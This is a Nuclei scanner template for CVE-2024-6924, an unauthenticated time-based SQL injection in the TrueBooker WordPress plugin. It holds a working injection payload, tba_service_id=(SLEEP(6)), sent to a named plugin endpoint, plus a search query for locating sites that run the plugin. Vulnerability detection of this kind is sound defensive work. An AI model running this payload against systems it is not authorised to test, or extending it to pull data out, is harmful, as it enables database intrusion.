nuclei-templates/http/cves/2024/CVE-2024-6924.yaml

48 lines
1.9 KiB
YAML

id: CVE-2024-6924
info:
name: TrueBooker <= 1.0.2 - SQL Injection
author: s4e-io
severity: high
description: |
The TrueBooker Appointment Booking and Scheduler Plugin. plugin for WordPress is vulnerable to SQL Injection in all versions up to, and including, 1.0.2 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/truebooker-appointment-booking/truebooker-102-unauthenticated-sql-injection
- https://wpscan.com/vulnerability/39e79801-6ec7-4579-bc6b-fd7e899733a8/
metadata:
vendor: themetechmount
product: truebooker
framework: wordpress
publicwww-query: "/wp-content/plugins/truebooker-appointment-booking"
tags: time-based-sqli,wpscan,cve,cve2024,sqli,wp,wp-plugin,wordpress,truebooker
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "/wp-content/plugins/truebooker-appointment-booking")'
internal: true
- raw:
- |
@timeout 20s
POST /wp-content/plugins/truebooker-appointment-booking/main/truebooker-service-price.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
tba_service_id=(SLEEP(6))
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
condition: and
# digest: 490a0046304402201dc0b7d53dd5dbc0d34071e292c972de3f4b3ca4bebb3f34b447b7b1a7439d370220121e1d4803ce39b160ab8f7929ce252c02015c12e00b27cdfce0d83d96327bb4:922c64590222798bb761d5b6d8e72950